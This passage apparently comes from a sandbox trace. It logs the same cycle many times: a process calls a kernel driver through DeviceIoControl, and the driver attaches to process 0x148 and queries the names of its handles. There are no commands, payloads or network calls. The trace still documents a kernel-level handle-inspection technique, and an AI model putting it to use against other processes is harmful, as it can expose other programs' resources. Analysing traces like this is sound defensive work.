0x2 [0243.667] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.667] ObQueryNameString (in: Object=0xfffff8a004425850, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.668] ObfDereferenceObject (Object=0xfffff8a004425850) returned 0x2 [0243.668] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.668] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.668] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.668] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.668] PsAcquireProcessExitSynchronization () returned 0x0 [0243.668] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.668] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0000ff5a0, HandleInformation=0x0) returned 0x0 [0243.668] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.668] PsReleaseProcessExitSynchronization () returned 0x2 [0243.668] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.668] ObQueryNameString (in: Object=0xfffff8a0000ff5a0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.668] ObfDereferenceObject (Object=0xfffff8a0000ff5a0) returned 0x1 [0243.668] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.668] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.668] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.668] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.668] PsAcquireProcessExitSynchronization () returned 0x0 [0243.668] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.668] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a008995de0, HandleInformation=0x0) returned 0x0 [0243.668] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.669] PsReleaseProcessExitSynchronization () returned 0x2 [0243.669] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.669] ObQueryNameString (in: Object=0xfffff8a008995de0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.669] ObfDereferenceObject (Object=0xfffff8a008995de0) returned 0x1 [0243.669] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.669] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.669] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0243.669] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.669] PsAcquireProcessExitSynchronization () returned 0x0 [0243.669] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.669] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003650f20, HandleInformation=0x0) returned 0x0 [0243.669] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.669] PsReleaseProcessExitSynchronization () returned 0x2 [0243.669] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.669] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.670] ObfDereferenceObject (Object=0xfffffa8003650f20) returned 0x1 [0243.670] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.670] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.670] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.670] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.670] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.670] PsAcquireProcessExitSynchronization () returned 0x0 [0243.670] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.670] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0089816b0, HandleInformation=0x0) returned 0x0 [0243.670] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.670] PsReleaseProcessExitSynchronization () returned 0x2 [0243.670] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.670] ObQueryNameString (in: Object=0xfffff8a0089816b0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.671] ObfDereferenceObject (Object=0xfffff8a0089816b0) returned 0x1 [0243.671] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.671] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.671] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.671] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.671] PsAcquireProcessExitSynchronization () returned 0x0 [0243.671] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.671] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00897a600, HandleInformation=0x0) returned 0x0 [0243.671] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.671] PsReleaseProcessExitSynchronization () returned 0x2 [0243.671] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.671] ObQueryNameString (in: Object=0xfffff8a00897a600, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.671] ObfDereferenceObject (Object=0xfffff8a00897a600) returned 0x1 [0243.671] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.671] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.671] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.672] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.672] PsAcquireProcessExitSynchronization () returned 0x0 [0243.672] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.672] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00899bca0, HandleInformation=0x0) returned 0x0 [0243.672] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.672] PsReleaseProcessExitSynchronization () returned 0x2 [0243.672] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.672] ObQueryNameString (in: Object=0xfffff8a00899bca0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.672] ObfDereferenceObject (Object=0xfffff8a00899bca0) returned 0x1 [0243.672] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.672] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.672] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.672] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.672] PsAcquireProcessExitSynchronization () returned 0x0 [0243.672] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.672] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001f7d4d0, HandleInformation=0x0) returned 0x0 [0243.672] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.672] PsReleaseProcessExitSynchronization () returned 0x2 [0243.672] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.672] ObQueryNameString (in: Object=0xfffff8a001f7d4d0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.672] ObfDereferenceObject (Object=0xfffff8a001f7d4d0) returned 0x1 [0243.672] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.672] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.672] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.672] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.673] PsAcquireProcessExitSynchronization () returned 0x0 [0243.673] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.673] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000a47e40, HandleInformation=0x0) returned 0x0 [0243.673] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.673] PsReleaseProcessExitSynchronization () returned 0x2 [0243.673] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.673] ObQueryNameString (in: Object=0xfffff8a000a47e40, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.673] ObfDereferenceObject (Object=0xfffff8a000a47e40) returned 0x1 [0243.673] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.673] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.673] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.673] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.673] PsAcquireProcessExitSynchronization () returned 0x0 [0243.673] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.673] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0089774a0, HandleInformation=0x0) returned 0x0 [0243.673] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.673] PsReleaseProcessExitSynchronization () returned 0x2 [0243.673] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.673] ObQueryNameString (in: Object=0xfffff8a0089774a0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.673] ObfDereferenceObject (Object=0xfffff8a0089774a0) returned 0x1 [0243.673] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.673] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.673] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.674] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.674] PsAcquireProcessExitSynchronization () returned 0x0 [0243.674] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.674] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000cb0c90, HandleInformation=0x0) returned 0x0 [0243.674] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.674] PsReleaseProcessExitSynchronization () returned 0x2 [0243.674] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.674] ObQueryNameString (in: Object=0xfffff8a000cb0c90, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.674] ObfDereferenceObject (Object=0xfffff8a000cb0c90) returned 0x1 [0243.674] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.674] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.674] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.674] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.674] PsAcquireProcessExitSynchronization () returned 0x0 [0243.674] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.674] ObReferenceObjectByHandle (in: Handle=0x2c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002284e10, HandleInformation=0x0) returned 0x0 [0243.674] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.674] PsReleaseProcessExitSynchronization () returned 0x2 [0243.674] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.674] ObQueryNameString (in: Object=0xfffff8a002284e10, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.674] ObfDereferenceObject (Object=0xfffff8a002284e10) returned 0x1 [0243.674] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.674] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.675] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.675] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.675] PsAcquireProcessExitSynchronization () returned 0x0 [0243.675] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.675] ObReferenceObjectByHandle (in: Handle=0x30c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001432c90, HandleInformation=0x0) returned 0x0 [0243.675] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.675] PsReleaseProcessExitSynchronization () returned 0x2 [0243.675] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.675] ObQueryNameString (in: Object=0xfffff8a001432c90, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.675] ObfDereferenceObject (Object=0xfffff8a001432c90) returned 0x1 [0243.675] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.675] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.675] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.675] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.675] PsAcquireProcessExitSynchronization () returned 0x0 [0243.675] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.675] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00112c820, HandleInformation=0x0) returned 0x0 [0243.675] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.675] PsReleaseProcessExitSynchronization () returned 0x2 [0243.675] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.675] ObQueryNameString (in: Object=0xfffff8a00112c820, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.675] ObfDereferenceObject (Object=0xfffff8a00112c820) returned 0x1 [0243.675] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.676] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.676] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.676] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.676] PsAcquireProcessExitSynchronization () returned 0x0 [0243.676] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.676] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f88880, HandleInformation=0x0) returned 0x0 [0243.676] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.676] PsReleaseProcessExitSynchronization () returned 0x2 [0243.676] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.676] ObQueryNameString (in: Object=0xfffff8a000f88880, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.676] ObfDereferenceObject (Object=0xfffff8a000f88880) returned 0x1 [0243.676] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.676] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.676] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.676] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.676] PsAcquireProcessExitSynchronization () returned 0x0 [0243.676] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.676] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fac530, HandleInformation=0x0) returned 0x0 [0243.676] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.676] PsReleaseProcessExitSynchronization () returned 0x2 [0243.676] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.676] ObQueryNameString (in: Object=0xfffff8a000fac530, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.677] ObfDereferenceObject (Object=0xfffff8a000fac530) returned 0x1 [0243.677] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.677] HeapFree 